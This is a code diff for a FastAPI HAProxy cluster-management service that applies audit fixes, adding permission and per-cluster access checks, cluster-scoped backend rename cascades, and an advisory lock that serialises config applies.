await close_database_connection(conn)
raise HTTPException(status_code=404, detail="Backend not found")
# Multi-tenancy: validate the operator has access to this cluster.
if backend['cluster_id']:
await validate_user_cluster_access(current_user['id'], backend['cluster_id'], conn)
# Check if server name already exists in this backend within the same cluster (only active servers)
existing = await conn.fetchrow("""
@@ -1006,30 +1114,136 @@ async def update_backend(backend_id: int, backend_update: BackendConfigUpdate, r
# CRITICAL FIX: Update server backend_name references if backend name changed
if backend_name_changed:
logger.info(f"BACKEND UPDATE: Backend name changed from '{old_backend_name}' to '{new_backend_name}', updating server references")
await conn.execute("""
UPDATE backend_servers
SET backend_name = $1, updated_at = CURRENT_TIMESTAMP
WHERE backend_name = $2
""", new_backend_name, old_backend_name)
updated_servers_count = await conn.fetchval("""
SELECT COUNT(*) FROM backend_servers WHERE backend_name = $1
""", new_backend_name)
# Bulgu #73 (round-22 audit) — cluster_id filter was
# MISSING pre-fix. The `backends` table allows the
# same name in different clusters (the unique key is
# `(cluster_id, name)`), so the un-scoped UPDATE
# would rewrite `backend_servers.backend_name` ACROSS
# CLUSTERS, leaving the OTHER cluster's backend
# orphaned (its servers now point at the new name on
# this cluster). Multi-tenant data-pollution at the
# storage layer. Scope to the rename's home cluster.
if cluster_id is not None:
await conn.execute("""
UPDATE backend_servers
SET backend_name = $1, updated_at = CURRENT_TIMESTAMP
WHERE backend_name = $2 AND cluster_id = $3
""", new_backend_name, old_backend_name, cluster_id)
else:
# Legacy cluster_id=NULL rows
await conn.execute("""
UPDATE backend_servers
SET backend_name = $1, updated_at = CURRENT_TIMESTAMP
WHERE backend_name = $2 AND cluster_id IS NULL
""", new_backend_name, old_backend_name)
if cluster_id is not None:
updated_servers_count = await conn.fetchval("""
SELECT COUNT(*) FROM backend_servers
WHERE backend_name = $1 AND cluster_id = $2
""", new_backend_name, cluster_id)
else:
updated_servers_count = await conn.fetchval("""
SELECT COUNT(*) FROM backend_servers
WHERE backend_name = $1 AND cluster_id IS NULL
""", new_backend_name)
logger.info(f"BACKEND UPDATE: Updated {updated_servers_count} server references to new backend name")
# CRITICAL FIX: Update frontend default_backend references if backend name changed
logger.info(f"FRONTEND UPDATE: Updating frontend default_backend references from '{old_backend_name}' to '{new_backend_name}'")
await conn.execute("""
UPDATE frontends
SET default_backend = $1, updated_at = CURRENT_TIMESTAMP
WHERE default_backend = $2 AND cluster_id = $3
""", new_backend_name, old_backend_name, cluster_id)
updated_frontends_count = await conn.fetchval("""
SELECT COUNT(*) FROM frontends WHERE default_backend = $1 AND cluster_id = $2
""", new_backend_name, cluster_id)
if cluster_id is not None:
await conn.execute("""
UPDATE frontends
SET default_backend = $1, last_config_status = 'PENDING', updated_at = CURRENT_TIMESTAMP
WHERE default_backend = $2 AND cluster_id = $3
""", new_backend_name, old_backend_name, cluster_id)
else:
await conn.execute("""
UPDATE frontends
SET default_backend = $1, last_config_status = 'PENDING', updated_at = CURRENT_TIMESTAMP
WHERE default_backend = $2 AND cluster_id IS NULL
""", new_backend_name, old_backend_name)
if cluster_id is not None:
updated_frontends_count = await conn.fetchval("""
SELECT COUNT(*) FROM frontends
WHERE default_backend = $1 AND cluster_id = $2
""", new_backend_name, cluster_id)
else:
updated_frontends_count = await conn.fetchval("""
SELECT COUNT(*) FROM frontends
WHERE default_backend = $1 AND cluster_id IS NULL
""", new_backend_name)
logger.info(f"FRONTEND UPDATE: Updated {updated_frontends_count} frontend default_backend references to new backend name")
# Bulgu #72 (round-22 audit) — cascade the rename
# into every frontend's `use_backend_rules` JSONB so
# `use_backend <old_name> if <cond>` becomes
# `use_backend <new_name> if <cond>`. Pre-fix the
# rename only touched `default_backend` and
# `backend_servers`; the routing rules silently
# broke because they still referenced the disappeared
# backend name. The agent's `haproxy -c` would then
# either fail the reload (`'no such backend'`) or —
# if a `default_backend` was also configured — emit
# traffic to the default and the operator would see
# 503 / wrong-app responses without an obvious
# control-plane cause.
#
# ACL rules are NOT cascaded — they don't reference
# backend names (they reference path/host patterns),
# and even if an ACL definition shared a backend's
# name as a substring, that was coincidence, not a
# contract.
if cluster_id is not None:
frontends_with_use_backend = await conn.fetch("""
SELECT id, name, use_backend_rules
FROM frontends
WHERE cluster_id = $1 AND is_active = TRUE
""", cluster_id)
else:
frontends_with_use_backend = await conn.fetch("""
SELECT id, name, use_backend_rules
FROM frontends
WHERE cluster_id IS NULL AND is_active = TRUE
""")
rename_count = 0
for fe in frontends_with_use_backend:
raw_rules = fe['use_backend_rules'] if fe['use_backend_rules'] else []
# asyncpg JSONB → already decoded; handle the
# legacy string-shaped column defensively.
if isinstance(raw_rules, str):
try:
raw_rules = json.loads(raw_rules)
except (TypeError, ValueError):
raw_rules = []
if not isinstance(raw_rules, list):
continue
renamed = [
_rename_use_backend_target(r, old_backend_name, new_backend_name)
for r in raw_rules
]
if renamed != raw_rules:
await conn.execute("""
UPDATE frontends
SET use_backend_rules = $1,
last_config_status = 'PENDING',
updated_at = CURRENT_TIMESTAMP
WHERE id = $2
""", json.dumps(renamed), fe['id'])
rename_count += 1
logger.info(
f"BACKEND RENAME: cascaded {old_backend_name!r}"
f" → {new_backend_name!r} in frontend"
f" {fe['name']!r} use_backend_rules"
)
if rename_count:
logger.info(
f"BACKEND RENAME: updated use_backend_rules in"
f" {rename_count} frontend(s)"
)
async with conn.transaction():
# Update main backend properties
# await conn.execute("""
@@ -1268,22 +1482,39 @@ async def delete_backend(backend_id: int, authorization: str = Header(None)):
# Parse use_backend_rules (JSONB array)
use_backend_rules = frontend['use_backend_rules'] if frontend['use_backend_rules'] else []
acl_rules = frontend['acl_rules'] if frontend['acl_rules'] else []
# Filter out rules referencing deleted backend
filtered_use_backend = [rule for rule in use_backend_rules if backend_name not in rule]
filtered_acl = [rule for rule in acl_rules if backend_name not in rule]
# Bulgu #71 (round-22 audit) — drop only the use_backend
# entries whose FIRST TOKEN matches the deleted backend
# exactly. Pre-fix the naive `backend_name not in rule`
# substring filter wiped `use_backend api-v2 ...` when
# "api" was deleted (and similarly for any `*api*` /
# `api*` backend pair). The `acl_rules` list is left
# untouched on purpose — ACL definitions are reusable
# predicates (e.g. `is_api hdr(host) -i api.example.com`)
# and have no semantic dependency on the deleted backend
# even when their name happens to share a substring.
filtered_use_backend = [
rule for rule in use_backend_rules
if _extract_use_backend_target(rule) != backend_name
]
filtered_acl = list(acl_rules)
# Update frontend if rules were removed
if len(filtered_use_backend) != len(use_backend_rules) or len(filtered_acl) != len(acl_rules):
if len(filtered_use_backend) != len(use_backend_rules):
import json
await conn.execute("""
UPDATE frontends
SET use_backend_rules = $1, acl_rules = $2,
UPDATE frontends
SET use_backend_rules = $1, acl_rules = $2,
last_config_status = 'PENDING', updated_at = CURRENT_TIMESTAMP
WHERE id = $3
""", json.dumps(filtered_use_backend), json.dumps(filtered_acl), frontend['id'])
logger.info(f"BACKEND DELETE: Cleaned ACL/use_backend rules for frontend '{frontend['name']}' (removed {backend_name} references)")
logger.info(
f"BACKEND DELETE: Cleaned use_backend rules for frontend "
f"'{frontend['name']}' (removed {len(use_backend_rules) - len(filtered_use_backend)} "
f"rule(s) targeting {backend_name!r}, "
f"{len(filtered_acl)} acl_rules preserved)"
)
# 3. Soft delete the backend (mark as inactive and set PENDING)
await conn.execute("""
@@ -1332,12 +1563,36 @@ async def delete_backend(backend_id: int, authorization: str = Header(None)):
@router.delete("/servers/{server_id}")
async def delete_server(server_id: int, request: Request, authorization: str = Header(None)):
"""Delete a server from backend"""
"""Delete a server from backend.
Bulgu #77 (round-22 audit) — pre-fix this handler only
authenticated the caller (`get_current_user_from_token`)
and did NOT check `backends.update` permission, so any
logged-in user — including read-only viewers — could
delete servers. The sibling backend-level DELETE / PUT /
POST handlers all enforced `backends.delete` /
`backends.update`; servers are part of the same RBAC
surface and were missing the same gate.
Bulgu #79 (round-22 audit) — also missing cluster
access validation. An operator scoped to cluster 1 could
delete a server in cluster 2 if they had `backends.update`
permission globally.
"""
try:
from auth_middleware import get_current_user_from_token
from auth_middleware import get_current_user_from_token, check_user_permission
current_user = await get_current_user_from_token(authorization)
has_permission = await check_user_permission(current_user["id"], "backends", "update")
if not has_permission:
raise HTTPException(
status_code=403,
detail="Insufficient permissions: backends.update required",
)
conn = await get_database_connection()
# Server's cluster is fetched right below; we validate
# access AFTER the fetch so the 404 path takes priority
# over the 403 (mirrors existing patterns in this file).
# Get server info before deletion
server = await conn.fetchrow("""
@@ -1348,20 +1603,25 @@ async def delete_server(server_id: int, request: Request, authorization: str = H
if not server:
await close_database_connection(conn)
raise HTTPException(status_code=404, detail="Server not found")
cluster_id = server['cluster_id']
backend_name = server['backend_name']
server_name = server['server_name']
# Bulgu #79 — validate the operator has access to the
# server's owning cluster BEFORE accepting the delete.
if cluster_id:
await validate_user_cluster_access(current_user['id'], cluster_id, conn)
# Get request body for cluster_id validation
request_body = await request.json() if hasattr(request, 'json') else {}
expected_cluster_id = request_body.get('cluster_id')
# Validate cluster ownership for multi-cluster security
if expected_cluster_id and cluster_id != expected_cluster_id:
await close_database_connection(conn)
raise HTTPException(
status_code=403,
status_code=403,
detail=f"Server belongs to cluster {cluster_id}, not cluster {expected_cluster_id}"
)
@@ -1456,11 +1716,21 @@ async def delete_server(server_id: int, request: Request, authorization: str = H
@router.put("/servers/{server_id}")
async def update_server(server_id: int, server_data: dict, request: Request, authorization: str = Header(None)):
"""Update server details"""
"""Update server details.
Bulgu #77 (round-22 audit) — see `delete_server` above; the
same authn-only / no-RBAC gap existed here.
"""
try:
from auth_middleware import get_current_user_from_token
from auth_middleware import get_current_user_from_token, check_user_permission
current_user = await get_current_user_from_token(authorization)
has_permission = await check_user_permission(current_user["id"], "backends", "update")
if not has_permission:
raise HTTPException(
status_code=403,
detail="Insufficient permissions: backends.update required",
)
conn = await get_database_connection()
# PHASE 2: Get FULL server record for snapshot
@@ -1471,9 +1741,13 @@ async def update_server(server_id: int, server_data: dict, request: Request, aut
if not existing_server:
await close_database_connection(conn)
raise HTTPException(status_code=404, detail="Server not found")
cluster_id = existing_server['cluster_id']
# Bulgu #79 — validate cluster access.
if cluster_id:
await validate_user_cluster_access(current_user['id'], cluster_id, conn)
# Build dynamic update query
update_fields = []
update_values = []
@@ -1617,13 +1891,22 @@ async def update_server(server_id: int, server_data: dict, request: Request, aut
@router.put("/servers/{server_id}/toggle")
async def toggle_server(server_id: int, request: Request, authorization: str = Header(None)):
"""Toggle server enabled/disabled status"""
"""Toggle server enabled/disabled status.
Bulgu #77 (round-22 audit) — see `delete_server` above.
"""
logger.error(f"SERVER TOGGLE DEBUG: Starting toggle for server_id={server_id}")
try:
from auth_middleware import get_current_user_from_token
from auth_middleware import get_current_user_from_token, check_user_permission
current_user = await get_current_user_from_token(authorization)
has_permission = await check_user_permission(current_user["id"], "backends", "update")
if not has_permission:
raise HTTPException(
status_code=403,
detail="Insufficient permissions: backends.update required",
)
logger.error(f"SERVER TOGGLE DEBUG: User authenticated: {current_user.get('username')}")
conn = await get_database_connection()
# Get server info
@@ -1635,13 +1918,17 @@ async def toggle_server(server_id: int, request: Request, authorization: str = H
if not server:
await close_database_connection(conn)
raise HTTPException(status_code=404, detail="Server not found")
# Bulgu #79 — validate cluster access.
if server['cluster_id']:
await validate_user_cluster_access(current_user['id'], server['cluster_id'], conn)
# Toggle server status
new_status = not server['is_active']
logger.error(f"SERVER TOGGLE DEBUG: Toggling server {server['server_name']} from {server['is_active']} to {new_status}")
await conn.execute("""
UPDATE backend_servers
SET is_active = $1, updated_at = CURRENT_TIMESTAMP
UPDATE backend_servers
SET is_active = $1, updated_at = CURRENT_TIMESTAMP
WHERE id = $2
""", new_status, server_id)
logger.error(f"SERVER TOGGLE DEBUG: Server status updated successfully")
+576 -44
View File
@@ -7,11 +7,127 @@ from datetime import datetime, timezone
from models import HAProxyClusterCreate, HAProxyClusterUpdate
from database.connection import get_database_connection, close_database_connection
from utils.activity_log import log_user_activity
# Bulgu #79 (round-22 audit) — cluster.py pre-fix had ZERO calls
# to `validate_user_cluster_access`. Every cluster-scoped
# mutation (`apply-changes`, `delete cluster`, `update cluster`,
# `restore config version`, `reject pending changes`, etc.)
# only checked permission ROLE (e.g. `apply.execute`) but never
# verified the operator actually has access to THIS particular
# cluster id. With permission roles granted globally, an
# operator scoped to cluster 1 (via `user_pool_access`) could
# call `POST /api/clusters/2/apply-changes` and apply cluster 2's
# pending changes, blow away cluster 2's `user_pool_access`
# scoping, etc. The helper duplicated across other routers
# (`backend.py`, `frontend.py`, `ssl.py`, `waf.py`, `agent.py`)
# is re-defined here to keep the module self-contained — a
# future refactor can hoist it into a shared `auth_middleware`
# module but the duplication is harmless and pin-tested.
async def validate_user_cluster_access(user_id: int, cluster_id: int, conn):
"""Validate that user has access to the specified cluster.
Admins bypass the check. Non-admins must have an active
(non-expired) row in `user_pool_access` for the cluster's
pool. Falls back to allow on legacy schemas missing the
table / column for backwards compatibility.
"""
cluster_exists = await conn.fetchval(
"SELECT id FROM haproxy_clusters WHERE id = $1", cluster_id
)
if not cluster_exists:
raise HTTPException(status_code=404, detail="Cluster not found")
is_admin = await conn.fetchval(
"SELECT is_admin FROM users WHERE id = $1", user_id
)
if is_admin:
return True
table_exists = await conn.fetchval("""
SELECT EXISTS (
SELECT 1 FROM information_schema.tables
WHERE table_name = 'user_pool_access'
)
""")
if not table_exists:
logger.warning(
"user_pool_access table not found, allowing cluster access "
"by fallback (legacy schema)"
)
return True
# Risk audit fix (post-Bulgu-#79): the original helper in
# routers/backend.py filters on `upa.is_active = TRUE` in
# addition to the expires_at window. Without it,
# soft-deleted access rows (`is_active = FALSE`) would still
# match — defeating the soft-delete contract. Also check
# whether the `expires_at` column exists so we keep the same
# backwards-compat shape as the existing helpers and don't
# introduce a column-missing 500 on legacy DBs that were
# working with the other routers' validators.
expires_at_exists = await conn.fetchval("""
SELECT EXISTS (
SELECT 1 FROM information_schema.columns
WHERE table_name = 'user_pool_access' AND column_name = 'expires_at'
)
""")
if expires_at_exists:
has_access = await conn.fetchval("""
SELECT EXISTS (
SELECT 1
FROM user_pool_access upa
JOIN haproxy_clusters hc ON hc.pool_id = upa.pool_id
WHERE upa.user_id = $1
AND hc.id = $2
AND upa.is_active = TRUE
AND (upa.expires_at IS NULL OR upa.expires_at > CURRENT_TIMESTAMP)
)
""", user_id, cluster_id)
else:
# Legacy schema without expires_at — match the same
# fallback the routers/backend.py helper uses so the
# two validators agree byte-for-byte on legacy DBs.
has_access = await conn.fetchval("""
SELECT EXISTS (
SELECT 1
FROM user_pool_access upa
JOIN haproxy_clusters hc ON hc.pool_id = upa.pool_id
WHERE upa.user_id = $1
AND hc.id = $2
AND upa.is_active = TRUE
)
""", user_id, cluster_id)
if not has_access:
raise HTTPException(
status_code=403,
detail="You don't have access to this cluster. Please contact your administrator."
)
return True
# Rate limiting import temporarily disabled
router = APIRouter(prefix="/api/clusters", tags=["clusters"])
logger = logging.getLogger(__name__)
class _ConcurrentlyDrained(Exception):
"""Sentinel raised inside ``apply_pending_changes`` when the
advisory-lock-protected re-fetch shows that another caller
has already drained the PENDING config-version list.
Risk-audit follow-up to Bulgu-#80. The earlier two-transaction
split between lock-and-recheck (TX1) and lock-and-apply (TX2)
left a brief gap where another caller could squeeze in, drain
PENDING rows, and commit before TX2 grabbed the lock. We now
collapse both phases into a single locked transaction and use
this sentinel to bail out cleanly when the re-fetch returns
empty. The class is module-level (not nested in the function
body) so Python can resolve it during ``except`` lookup even
when an OTHER exception is raised before the function reaches
the class-definition statement.
"""
def _extract_entities_from_config(config_content: str) -> dict:
"""Extract entity names from HAProxy config content for sync purposes"""
import re
@@ -265,18 +381,21 @@ async def update_cluster(cluster_id: int, cluster: HAProxyClusterUpdate, authori
status_code=403,
detail="Insufficient permissions: clusters.update required"
)
conn = await get_database_connection()
# Check if cluster exists and get current values
existing_cluster = await conn.fetchrow("""
SELECT name, description, connection_type, is_active, stats_socket_path,
haproxy_config_path, haproxy_bin_path, pool_id, acme_enabled
SELECT name, description, connection_type, is_active, stats_socket_path,
haproxy_config_path, haproxy_bin_path, pool_id, acme_enabled
FROM haproxy_clusters WHERE id = $1
""", cluster_id)
if not existing_cluster:
await close_database_connection(conn)
raise HTTPException(status_code=404, detail="Cluster not found")
# Bulgu #79 — validate cluster access (admins bypass).
await validate_user_cluster_access(current_user['id'], cluster_id, conn)
# Build dynamic update query - only update fields that are provided (not None)
update_fields = []
@@ -398,7 +517,7 @@ async def update_cluster(cluster_id: int, cluster: HAProxyClusterUpdate, authori
@router.get("/{cluster_id}", summary="Get Cluster by ID", response_description="Cluster details")
async def get_cluster(cluster_id: int):
async def get_cluster(cluster_id: int, authorization: str = Header(None)):
"""
# Get Specific HAProxy Cluster
@@ -436,6 +555,14 @@ async def get_cluster(cluster_id: int):
- **500**: Server error
"""
try:
# R18c audit fix (round 6 final convergence): authenticate
# the caller before fetching cluster topology by ID. Pre-fix
# this sibling of GET /api/clusters was anonymous, so an
# attacker could iterate cluster IDs to enumerate the same
# info (stats socket, paths, ACME flags, pool identity) the
# list endpoint just locked down. Closes the asymmetry.
from auth_middleware import get_current_user_from_token
await get_current_user_from_token(authorization)
conn = await get_database_connection()
cluster = await conn.fetchrow("""
@@ -475,7 +602,7 @@ async def get_cluster(cluster_id: int):
raise HTTPException(status_code=500, detail=str(e))
@router.get("", summary="Get All Clusters", response_description="List of all clusters")
async def get_clusters():
async def get_clusters(authorization: str = Header(None)):
"""
# Get All HAProxy Clusters
@@ -536,6 +663,17 @@ async def get_clusters():
- **500**: Server error
"""
try:
# R18c audit fix (round 6 #3 — KRITIK info leak): require an
# authenticated caller. Pre-fix the endpoint accepted
# anonymous GETs and returned cluster topology including
# internal HAProxy paths (stats socket, config path, bin
# path), pool ids, ACME flags, and agent counts. This is
# both reconnaissance for an attacker and the spine of the
# cluster-scoped RBAC the rest of the platform builds on,
# so guarding it at the read layer is essential after R18c
# round 5's roster + role guards.
from auth_middleware import get_current_user_from_token
await get_current_user_from_token(authorization)
conn = await get_database_connection()
clusters = await conn.fetch("""
@@ -1265,9 +1403,16 @@ async def apply_pending_changes(
status_code=403,
detail="Insufficient permissions: apply.execute required"
)
conn = await get_database_connection()
# Bulgu #79 — validate the operator actually has access
# to THIS cluster. Pre-fix the `apply.execute` permission
# was granted globally, so any operator with the role
# could apply changes to ANY cluster, including clusters
# in pools they were never granted access to.
await validate_user_cluster_access(current_user['id'], cluster_id, conn)
# Apply all pending changes without validation - validation issues will be handled by HAProxy itself
# Users will handle configuration completeness through the centralized Apply Management page
@@ -1367,7 +1512,96 @@ async def apply_pending_changes(
"changes": [{"version_name": v["version_name"], "created_at": v["created_at"].isoformat().replace('+00:00', 'Z')} for v in pending_versions]
}
# Bulgu #80 (round-22 audit) — serialise concurrent
# apply-changes against the SAME cluster. Pre-fix the
# entire apply pipeline was unprotected: two operators
# clicking Apply at the same instant (or one operator
# double-clicking from two tabs / an API client retrying
# on timeout) both raced through the "fetch pending
# versions → render consolidated config → INSERT APPLIED
# version → mark pending APPLIED → notify agents"
# pipeline. The DB ended up with two
# `APPLIED`/`is_active=TRUE` consolidated rows for the
# same cluster, both agent notifications fired, and the
# agent that pulled second silently overwrote whatever
# the first one had loaded — including the case where
# the two consolidated configs disagreed on which
# pending versions made it in.
#
# `pg_advisory_xact_lock` is the same primitive
# `site_wizard.py::create_site` already uses for
# per-cluster serialisation (Bulgu #54). The lock is
# automatically released on COMMIT or ROLLBACK, so we
# don't need an explicit `unlock` path. We use a unique
# namespace constant (`18181820`) so the lock space is
# disjoint from the wizard's draft-cap and create-site
# lock spaces. Concurrent callers BLOCK until the
# holder finishes; they then re-check the pending list
# and bail out cleanly when it's drained.
#
# The lock must live inside an explicit transaction
# (xact_lock semantics require it), so we open the
# apply transaction immediately around the lock + the
# pending-list re-fetch. The post-lock re-fetch is
# critical: the racing caller's first read happened
# BEFORE the lock was held; the rows may have been
# consolidated by the holder in the meantime.
APPLY_LOCK_NS = 18181820
# Risk-audit refinement (post-Bulgu-#80): the earlier
# implementation split the lock acquisition and the
# apply pipeline into TWO advisory-locked transactions
# with a brief gap between them. Because
# `pg_advisory_xact_lock` releases automatically on
# COMMIT, a concurrent caller could squeeze in during
# that gap, drain all PENDING versions, and the second
# transaction would proceed to ship a fresh config
# generated from the (now-already-applied) database
# state — producing a duplicate consolidated APPLIED
# version and a redundant agent notification. We
# collapse to ONE locked transaction: acquire the
# lock, RE-FETCH `pending_versions` under the lock
# (the outer fetch at line ~1402 is now stale-as-of
# pre-lock), filter previously-detected orphans, and
# bail via a sentinel exception if the list drained.
# Rollback on the sentinel keeps the no-op idempotent
# because no APPLY state has been written yet at that
# point. All operations that actually mutate state run
# AFTER this re-fetch inside the same locked TX.
async with conn.transaction():
await conn.execute(
"SELECT pg_advisory_xact_lock($1, $2)",
APPLY_LOCK_NS,
cluster_id,
)
pending_versions_locked = await conn.fetch("""
SELECT id, version_name, created_at, config_content, checksum, metadata
FROM config_versions
WHERE cluster_id = $1 AND status = 'PENDING'
ORDER BY created_at ASC
""", cluster_id)
pending_versions_locked = [
v for v in pending_versions_locked
if v['id'] not in orphan_version_ids
]
if not pending_versions_locked:
# Concurrent caller already drained — bail
# via the sentinel exception. The `async
# with conn.transaction():` rolls back on
# the propagating exception, releasing the
# advisory lock cleanly. The outer
# `except _ConcurrentlyDrained:` (defined
# before the generic catch-all) returns the
# standard "nothing to apply" response.
raise _ConcurrentlyDrained()
# Overwrite the pre-lock snapshot so every
# downstream consumer (restore detection,
# consolidated-version metadata, agent
# notification payloads) operates on the
# authoritative locked view.
pending_versions = pending_versions_locked
# CRITICAL: SSL scope-aware apply (MUST be inside transaction for atomicity)
# SSL update'lerde tek Apply tıklaması ile scope'daki tüm cluster'lara yayılır
# Global SSL: Tüm cluster'lar, Cluster-specific SSL: İlgili cluster'lar
@@ -2093,7 +2327,26 @@ defaults
response_data["message"] += f" (+ {sum(1 for r in global_apply_results if r['success'])} other clusters with global SSL)"
return response_data
except _ConcurrentlyDrained:
# Risk-audit follow-up to Bulgu-#80: a concurrent
# apply caller drained the PENDING list while we
# were blocked on the advisory lock. Return the same
# idempotent "nothing to do" shape the early-return
# at line ~1473 produces so the FE/CLI handle both
# paths identically. Connection is closed here
# because the route handler's normal completion path
# doesn't run.
try:
await close_database_connection(conn)
except Exception:
pass
return {
"message": "No pending changes to apply (consumed by concurrent apply)",
"applied_count": 0,
}
except HTTPException:
raise
except Exception as e:
logger.error(f"Error applying pending changes: {e}")
raise HTTPException(status_code=500, detail=str(e))
@@ -2470,8 +2723,62 @@ defaults
return lines[start_idx:end_idx]
version_name = current_version['version_name']
prev_lines_full = previous_version['config_content'].split('\n') if previous_version else []
curr_lines_full = current_version['config_content'].split('\n')
# Bulgu #15 (post-Round-4 audit): apply a renderer-equivalent
# normalization to BOTH sides of the diff before splitting
# into lines. This neutralises renderer evolution between
# the time the previous version was rendered (older renderer)
# and the current version (newer renderer) so the diff
# surfaces ONLY operator-intent changes.
#
# Concrete scenario the user hit:
# * Operator opens the wizard, only edits the new
# site's frontend port + a single backend-server IP,
# creates two NEW entities (fe-site2 + be-site2).
# * Expected diff: only `+` lines for the two new
# blocks.
# * Actual diff pre-fix: every existing frontend in the
# cluster showed `-` lines for redundant
# `http-request track-sc0 src` calls (now deduped by
# the new renderer), and the unmodified `be-site`
# backend showed a `-` line stripping `cookie srv1`
# from its server (now guarded by the renderer when
# the parent backend has no `cookie_name`).
#
# Normalising both sides through the same canonical pass
# cancels out the renderer-only differences before the
# textual diff is computed. The function is idempotent so
# configs that were already rendered with the new
# renderer pass through unchanged.
try:
from services.haproxy_config import (
_normalize_haproxy_config_text_for_diff,
)
prev_raw = (
previous_version['config_content']
if previous_version and previous_version['config_content']
else ''
)
curr_raw = current_version['config_content'] or ''
prev_norm = _normalize_haproxy_config_text_for_diff(prev_raw)
curr_norm = _normalize_haproxy_config_text_for_diff(curr_raw)
except Exception as _norm_err:
# Defensive: never let a normalization bug break the
# diff endpoint. Fall back to the raw stored text on
# any error path.
logger.warning(
f"DIFF NORMALIZE: falling back to raw config text "
f"due to normalization error: {_norm_err}"
)
prev_norm = (
previous_version['config_content']
if previous_version and previous_version['config_content']
else ''
)
curr_norm = current_version['config_content'] or ''
prev_lines_full = prev_norm.split('\n') if prev_norm else []
curr_lines_full = curr_norm.split('\n')
scoped_prev = prev_lines_full
scoped_curr = curr_lines_full
@@ -2490,6 +2797,10 @@ defaults
else:
# Scope diffs for entity types to avoid showing whole file additions
# Bulgu #15: feed `extract_block` from the NORMALIZED
# text on both sides, mirroring the full-diff branch
# above, so entity-scoped diffs also surface only
# operator-intent changes.
conn2 = await get_database_connection()
try:
if m_backend:
@@ -2497,15 +2808,15 @@ defaults
be_row = await conn2.fetchrow("SELECT name FROM backends WHERE id = $1", be_id)
if be_row and be_row['name']:
name = be_row['name']
scoped_prev = extract_block(previous_version['config_content'] if previous_version else '', 'backend', name)
scoped_curr = extract_block(current_version['config_content'], 'backend', name)
scoped_prev = extract_block(prev_norm, 'backend', name)
scoped_curr = extract_block(curr_norm, 'backend', name)
elif m_frontend:
fe_id = int(m_frontend.group(1))
fe_row = await conn2.fetchrow("SELECT name FROM frontends WHERE id = $1", fe_id)
if fe_row and fe_row['name']:
name = fe_row['name']
scoped_prev = extract_block(previous_version['config_content'] if previous_version else '', 'frontend', name)
scoped_curr = extract_block(current_version['config_content'], 'frontend', name)
scoped_prev = extract_block(prev_norm, 'frontend', name)
scoped_curr = extract_block(curr_norm, 'frontend', name)
elif m_waf:
# For WAF rules, show full diff as WAF rules are mixed throughout config
scoped_prev = prev_lines_full
@@ -2522,8 +2833,8 @@ defaults
)
if sv_row and sv_row['backend_name']:
be_name = sv_row['backend_name']
scoped_prev = extract_block(previous_version['config_content'] if previous_version else '', 'backend', be_name)
scoped_curr = extract_block(current_version['config_content'], 'backend', be_name)
scoped_prev = extract_block(prev_norm, 'backend', be_name)
scoped_curr = extract_block(curr_norm, 'backend', be_name)
finally:
await close_database_connection(conn2)
@@ -3112,17 +3423,20 @@ async def confirm_restore_config_version(
current_user = await get_current_user_from_token(authorization)
conn = await get_database_connection()
# Bulgu #79 — validate cluster access (admins bypass).
await validate_user_cluster_access(current_user['id'], cluster_id, conn)
# Get version to restore
version_to_restore = await conn.fetchrow(
"SELECT * FROM config_versions WHERE id = $1 AND cluster_id = $2",
version_id, cluster_id
)
if not version_to_restore:
await close_database_connection(conn)
raise HTTPException(status_code=404, detail="Configuration version not found")
if not version_to_restore['config_content']:
await close_database_connection(conn)
raise HTTPException(status_code=400, detail="Version has no config content")
@@ -3841,23 +4155,77 @@ async def undo_reject_config_version(
try:
from auth_middleware import get_current_user_from_token
current_user = await get_current_user_from_token(authorization)
conn = await get_database_connection()
# Bulgu #79 — validate cluster access (admins bypass).
await validate_user_cluster_access(current_user['id'], cluster_id, conn)
# Check if version exists and is REJECTED
version_to_undo = await conn.fetchrow(
"SELECT * FROM config_versions WHERE id = $1 AND cluster_id = $2",
version_id, cluster_id
)
if not version_to_undo:
await close_database_connection(conn)
raise HTTPException(status_code=404, detail="Configuration version not found")
if version_to_undo['status'] != 'REJECTED':
await close_database_connection(conn)
raise HTTPException(status_code=400, detail="Only REJECTED versions can be undone")
# Bulgu #16 (round-6 audit) — defensive guard against
# undo of bulk-site-create-* / bulk-import-* / restore-*
# rejections.
#
# Why this guard exists: the reject path for these
# destructive bulk operations calls
# `rollback_entity_from_snapshot` for every entity in
# `metadata.bulk_snapshots`. For CREATE-op snapshots that
# routes to `_rollback_create` which HARD-DELETEs the rows
# (frontends / backends / backend_servers / letsencrypt_orders
# / ssl_certificates). The wizard's `_entity_snapshot`
# helper stores `new_values={}` so we have no preserved
# state to recreate from.
#
# The pre-fix undo silently flipped the version status
# back to PENDING and matched zero rows on the entity-
# status UPDATE. The next agent pull would render config
# WITHOUT the wizard's frontends/backends (they no longer
# exist), the apply would succeed cosmetically, and the
# operator would be confused why their "undone" site is
# nowhere to be found.
#
# Explicit 409 here forces the operator to re-create via
# the wizard — the only path that produces a recoverable
# state. The UI can hide / disable the Undo button for
# bulk versions in REJECTED state to make this guard
# self-documenting.
version_name = version_to_undo['version_name'] or ''
DESTRUCTIVE_PREFIXES = (
'bulk-site-create-',
'bulk-import-',
'bulk-proxied-host-create-', # legacy naming, pre-1.5.0
'restore-',
)
if version_name.startswith(DESTRUCTIVE_PREFIXES):
await close_database_connection(conn)
raise HTTPException(
status_code=409,
detail=(
f"Cannot undo rejection of '{version_name}'. This "
"version represents a destructive bulk operation: on "
"reject the underlying entities (frontends, backends, "
"servers, certs) were permanently deleted and the "
"snapshot does not carry enough state to recreate "
"them. Re-create the site via the wizard / re-run the "
"bulk import instead — that path also produces a "
"clean PENDING version that you can audit on Apply "
"Management."
),
)
async with conn.transaction():
# Mark the version as PENDING again
await conn.execute("""
@@ -4252,14 +4620,17 @@ async def delete_cluster(cluster_id: int, authorization: str = Header(None)):
status_code=403,
detail="Insufficient permissions: clusters.delete required"
)
conn = await get_database_connection()
# Check if cluster exists
cluster = await conn.fetchrow("SELECT name FROM haproxy_clusters WHERE id = $1", cluster_id)
if not cluster:
await close_database_connection(conn)
raise HTTPException(status_code=404, detail="Cluster not found")
# Bulgu #79 — validate cluster access (admins bypass).
await validate_user_cluster_access(current_user['id'], cluster_id, conn)
# Check for dependencies before deletion
dependencies = []
@@ -4306,7 +4677,44 @@ async def delete_cluster(cluster_id: int, authorization: str = Header(None)):
async with conn.transaction():
# Delete config versions first (they reference cluster)
await conn.execute("DELETE FROM config_versions WHERE cluster_id = $1", cluster_id)
# R18 audit fix (round 3 #8): wizard_drafts.payload carries
# the chosen cluster_id as JSONB. Without explicit cleanup,
# deleting a cluster left every operator's saved Site Drafts
